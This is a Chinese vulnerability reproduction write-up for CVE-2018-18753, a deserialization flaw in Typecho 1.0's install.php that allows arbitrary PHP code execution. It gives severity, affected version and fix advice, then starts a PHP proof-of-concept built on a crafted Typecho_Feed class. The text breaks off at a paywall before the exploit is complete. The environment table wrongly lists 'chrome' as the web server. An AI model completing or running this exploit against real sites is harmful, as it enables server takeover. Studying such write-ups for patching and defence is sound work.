typecho_14.10.10_unserialize _ CVE-2018-18753
| 说明 | 内容 |
|---|---|
| 漏洞编号 | CVE-2018-18753 |
| 漏洞名称 | Typecho CMS 反序列化漏洞 |
| 漏洞评级 | 高危 |
| 影响范围 | typecho1.0(14.10.10) |
| 漏洞描述 | typecho是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 |
| 修复方案 | 升级 打补丁 上设备 |
漏洞描述
Typecho原本是一款博客系统,其框架体系有别于市面上一般意义MVC框架,主体代码以自创的Widget为基类,整体非常简洁。
typecho是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。
漏洞等级
高危
影响版本
- typecho1.0(14.10.10)
漏洞复现
基础环境
| 组件 | 版本 |
|---|---|
| OS | windows server 2016 |
| Web Server | chrome |
| typecho | 14.10.10 |
漏洞验证
-
编写POC
<?php class Typecho_Feed{ const RSS1 = 'RSS 1.0'; const RSS2 = 'RSS 2.0'; const ATOM1 = 'ATOM 1.0'; const DATE_RFC822 = 'r'; const DATE_W3CDTF = 'c'; const EOL = "\n"; private $_type; private $_items; public function __construct(){ $this->_type = $this::RSS2; $this->_items[0] = array( 'title' =>

最低0.47元/天 解锁文章
852





